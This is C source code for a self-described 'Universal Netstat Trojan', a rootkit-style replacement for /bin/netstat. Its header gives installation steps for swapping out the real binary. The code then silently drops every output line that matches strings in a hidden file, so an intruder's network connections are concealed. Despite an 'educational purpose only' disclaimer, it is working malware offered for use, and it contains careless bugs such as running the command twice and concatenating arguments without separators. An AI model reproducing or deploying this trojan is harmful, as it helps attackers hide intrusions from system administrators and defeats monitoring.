/*
*                 Universal Netstat Trojan Beta version
*
*                   !!! EDUCATIONAL PURPOSE ONLY !!!
*
*                   CONFIDENTIAL - SOURCE MATERIALS
*
* You are not allowed to reproduce this software without Author
* security's team permissions.
*****************************************************************************
*
* (C) COPYRIGHT Security
* All Rights Reserved
*
*****************************************************************************
* 
* IDEA by Angelo Rosiello (Guilecool)
*
* CODED by Guilecool and eXedes
*
* FRIENDS DiGiT by ADM, dekadish and anakata
*
* LAMERS MrHarley and all #mrharley ppl, euge, [LuNa]
*
* HOW TO USE ?
*
* 1) #define LISTOFITEMS "/tmp/.sysproc"
* Put here the strings yout to be hidden, you must create it by your self!
*
* 2) #define TMPOUTFILE  "/tmp/.tmp"
* If you wish u can change the TMPOUTFILE but it's not needed. 
* 
* Compile the file
* Move the real /bin/netstat in /usr/bin/netstat
* Put netstatx in /bin
* For example :
* #gcc netstatx.c -o netstatx
* #mv /bin/netstat /usr/bin/netstat
* #mv netstatx /bin/netstat
*
* There you go!
*
* Good bye ;>
*
* DO Not Hack, that's stupid ;>
*
* PS: Italian--->
* L'autore si manleva da ogni responsabilità circa l'uso che terzi possono fare
* del programma in questione. Il programma nasce come esempio di strumento atto
* a nascondere delle stringhe dallo Standard Output.
* CONSIGLIO: Non hackate, è stupido :>
*/


#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdio.h>

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>


#define READBUFFERLEN 512
#define LISTOFITEMS "/tmp/.sysproc" //this is the file where u have to put the strings u wish to be hidden
#define TMPOUTFILE  "/tmp/.tmp" //U can modify here, if u want

#define new(p) ( p * )malloc(sizeof ( p ))

unsigned char filter (char *big , char *lil ) ;

// Hiding
struct ItemList
{
	char *item ;
	struct ItemList *next ;
} ;



// Aggiunge una stringa di path alla lista
// Ritorna 0 se c'e' errore
// 1 altrimenti

unsigned char AddItemToHide (struct ItemList **p, char *str)
{
 struct	ItemList	*ptr	;
 unsigned int		len 	;

 if	(!str)
	return	0 ;

 ptr = new ( struct ItemList )	;
 ptr->next = *p ;

 len = strlen(str) ;
 ptr->item = (char *) malloc (len-1) ;

 strncpy(ptr->item,str,len-1);
 *p = ptr ;

 return 1 ;

}

// Distruttore della lista

void Destroy (struct ItemList **p)
{

	if	(!(*p))
	    	return	;

	if	((*p)->next)
	{
		free((*p)->item)	;
		Destroy(&((*p)->next))	;
	}

	free (*p)	;
}


// Trova un item nella lista * non serve x ora :)

unsigned int	FindItem ( struct ItemList *p , char *item )
{
 struct ItemList	*ptr	;

 int	len	;

 if	( !p || !item )
 	return 0 ;


 ptr = p  ;

 while	(ptr)
 {
	 if	( !strcmp(item,ptr->item) )
		 return 1 ;
	 ptr = ptr->next ;
 }
 return 0 ;
}


// carica il conenuto del file puntato da path
// nella struttura puntata da p
// ritorna i files nascosti in caso di successo , 0 altrimenti
unsigned long LoadHideList (char *path, struct ItemList **p )
{
	FILE *fp	;

	char buffer[READBUFFERLEN]	;

	unsigned long count = 0	;

	fp = fopen (path,"r")	;

	// se non trovo il file
	if	( !fp )
	{
		printf	("*file not found* : %s\n",path )	;
		return 0	;
	}


	while	( !feof ( fp ) )
	{
		++count	;
		fscanf(fp,"%s",buffer );
		if ( !isspace ( *buffer ) )
			AddItemToHide( p , buffer )	;
	}

	fclose(fp)	;

	if ( !count )
	   return 0	;
	else
	   return count	;
}



// ritorna 1 se la stringa lil e presente in big in forma intera
// Non utilizzato qui :)
unsigned char filter (char *big , char *lil )
{

	char *ptr	;  // pointer to the first occurance
	char end	;
	char begin	;
	unsigned char rc	;

	if	( !big || ! lil )
		return 0	;

	ptr = strstr(big,lil)	;
	if	( !ptr  )
		rc = 0 ;
	else
	{
	// se e' l'ultima della riga

		end = *(ptr+strlen(lil)) ;
		if (  end == '\n' || end == 0x20 || end == 0)
		{
			if ( ptr != big )
			{
				begin = *( ptr - 1 ) ;
				if ( begin == 0x20 )
					rc = 1 ;
				else
					rc = 0 ;
			}
			 else
				rc = 1 ;
		}
		else
		    	rc = 0 ;
	}

	return rc ;
}


int main (int argc, char **argv)
{

	pid_t	pid	;
	int 	i 	;
	int 	len=0	;
        int     c       ;
	int     size    ;
	FILE *fp 	;
	char *strcmd 	;
       
	char buffer[READBUFFERLEN]	;
	unsigned char found	;



	struct ItemList *ItemsToHide = NULL	;
	struct ItemList *ptr = NULL	;

	// Rikostruisco la lista delle variabili

	// rakkatto la dimensione totale della stringa di comando
	for	( i = 1	;i < argc ; i ++ )
		len += strlen( argv[i] ) + 1 ;


 	len += strlen ( "/usr/bin/netstat " );

	// e qui la creo
	size = ( len + 4 + strlen(TMPOUTFILE) ) * sizeof(char)  ;

	strcmd = ( char * ) malloc ( size ) ;

	strcat ( strcmd , "/usr/bin/netstat " );


	for	( i = 1	; i < argc ; i ++ )
		strcat(strcmd,argv[i]);

	strcat ( strcmd , " > " )	;
	strcat ( strcmd , TMPOUTFILE )	;

	system ( strcmd );
        c = system ( strcmd );
        if ( c<0 )
         {
         	system ( "rm /tmp/.tmp" );
           	return;
         }

	//carico gli Item da Hidare

	LoadHideList (LISTOFITEMS,&ItemsToHide) ;

	fp = fopen ( TMPOUTFILE , "r" ) ;

	if	(!fp)
	    	exit(0);



	while	(!feof(fp))
	{
		ptr = ItemsToHide ;
		fgets ( buffer , READBUFFERLEN , fp );

		for ( found = 0 ;  ptr ; ptr = ptr -> next )
			if ( strstr ( buffer , ptr->item) )
			{
				found = 1 ;
				break ;
			}
		if ( ! found )
			printf ( "%s",buffer ) ;

 	}

	fclose (fp) ;
        system ( "rm /tmp/.tmp" );
	free ( strcmd ) ;


	if ( ItemsToHide )
	    Destroy(&ItemsToHide) ;

}